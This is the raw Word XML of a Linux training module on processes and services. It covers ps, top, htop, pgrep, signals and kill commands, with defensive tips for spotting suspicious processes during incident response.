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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">MODULE 10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9DC3E6"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Process &amp; Service Management</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="BDD7EE"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase 2: Linux Fundamentals  •  MindGigs Cybersecurity Training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Duration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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase 2</w:t>
            </w:r>
          </w:p>
        </w:tc>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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Week 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Module Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This module explores how Linux manages running programs through processes and services — two areas of critical importance for cybersecurity professionals. Understanding processes allows analysts to detect malicious activity, identify suspicious programs consuming system resources, and investigate potential compromises. Service management skills enable students to control system daemons, audit what is running on a target system, and harden Linux servers by disabling unnecessary services. These skills are applied daily in SOC work, incident response, and penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Learning Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By the end of this module, students will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain what a process is and describe the Linux process lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use ps, top, htop, and pgrep to monitor and investigate running processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send signals to processes using kill, pkill, and killall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand foreground vs. background job management using jobs, bg, fg, and nohup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain the role of systemd as the Linux init system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use systemctl to start, stop, enable, disable, and inspect services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigate services for security purposes — identify unexpected or suspicious services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand cron and scheduled tasks as a persistence mechanism used by attackers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Concepts &amp; Terminology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding Linux Processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A process is a running instance of a program. Every time you execute a command, open an application, or start a service, Linux creates a process. Each process is assigned a unique Process ID (PID) and is associated with a user (UID), group (GID), and a parent process (PPID).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux processes form a tree structure. The root of this tree is systemd (PID 1), which is the first process started by the kernel. Every other process is a descendant of PID 1. Understanding parent-child relationships is important for tracing how malicious processes were spawned.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View the full process tree</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">pstree -p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 output snippet:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">systemd(1)─┬─sshd(892)───sshd(1204)───bash(1210)───pstree(1389)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">           ├─cron(901)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">           ├─apache2(910)─┬─apache2(911)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">           │              └─apache2(912)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">           └─rsyslogd(875)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Process Attributes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Attribute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Process ID — unique integer assigned to each process by the kernel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PPID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Parent Process ID — the PID of the process that spawned this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UID / EUID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User ID / Effective User ID — who owns the process and what privileges it runs with (EUID matters for SUID binaries)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TTY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The terminal the process is attached to. '?' means no terminal (background daemon)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STAT /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Current process state: R (running), S (sleeping), Z (zombie), T (stopped), D (uninterruptible sleep)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CPU% / MEM%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Percentage of CPU and memory the process is consuming — useful for spotting resource abuse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The command that launched the process, including arguments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Monitoring Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ps — Process Snapshot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ps (process status) prints a snapshot of currently running processes. It is one of the most important commands for incident investigation.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Show all processes with full details (most common for security work)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ps aux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Columns: USER  PID  %CPU  %MEM  VSZ  RSS  TTY  STAT  START  TIME  COMMAND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process tree with PIDs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ps axjf</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all processes owned by a specific user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ps -u www-data</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 specific process by PID</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ps -p 1204 -o pid,ppid,user,stat,cmd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Search for a process by name</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ps aux | grep apache2</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full command line (reveals hidden malware arguments)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ps aux --no-headers -ww | grep -v grep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">top &amp; htop — Live Process Monitor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">top provides a real-time, continuously updating view of system processes and resource usage. htop is an improved interactive version with color and mouse support.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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Key Features &amp;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Built-in on all Linux systems. Shows CPU, memory, load averages, and running processes sorted by CPU usage by default.
Key shortcuts: q (quit), k (kill process), r (renice), M (sort by memory), P (sort by CPU), u (filter by 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htop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Must be installed: sudo apt install htop. Color-coded, scrollable process list. Supports mouse clicks, F-key actions, and filtering.
Key shortcuts: F6 (sort), F4 (filter/search), F9 (kill), F5 (tree view), F3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pgrep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Search for processes by name and return their PIDs. Example: pgrep -l ssh returns all SSH process PIDs and names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pidof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Return the PID(s) of a running program by name. Example: pidof apache2</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Security Use Case: Spotting Suspicious Processes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">When investigating a compromised system, analysts look for: processes with unusual names (typosquatted binaries like 'sshdd' or 'crond'), processes running as root that shouldn't be, processes with no TTY that were recently started, processes with blank or suspicious CMD fields (common with packed malware), and processes whose binary path doesn't exist on disk (fileless malware). Always check ps aux and compare against a known baseline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending Signals to Processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Signals are software interrupts sent to processes to request a specific action. The most common use is terminating misbehaving or malicious processes. Each signal has a name and a number.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Signal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Number</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Default Action &amp;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SIGHUP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Hang up — originally sent when terminal closes. Commonly used to tell daemons to reload their configuration without restarting.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SIGINT  (2)</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Interrupt — equivalent to pressing Ctrl+C. Requests graceful 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SIGKILL  (9)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Kill — cannot be caught or ignored. Immediately terminates the process. Use when SIGTERM fails. Does not allow cleanup.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SIGTERM  (15)</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Terminate — the default kill signal. Requests graceful shutdown. Allows the process to clean up before exiting.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SIGSTOP  (19)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Stop — pauses process execution. Cannot be caught or ignored. Resume with SIGCONT.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SIGCONT  (18)</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Continue — resumes a stopped process.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Graceful termination (always try this first)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">kill 1234           # sends SIGTERM (15) to PID 1234</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">kill -15 1234       # explicit SIGTERM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Force kill (when SIGTERM is ignored)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">kill -9 1234        # sends SIGKILL — cannot be ignored</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">kill -SIGKILL 1234  # same thing</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Kill by process name</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">pkill apache2       # sends SIGTERM to all processes named apache2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">pkill -9 malware    # force-kill all processes named 'malware'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Kill all instances of a process</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">killall nginx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Send SIGHUP to reload a daemon's config</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">kill -1 $(pidof sshd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
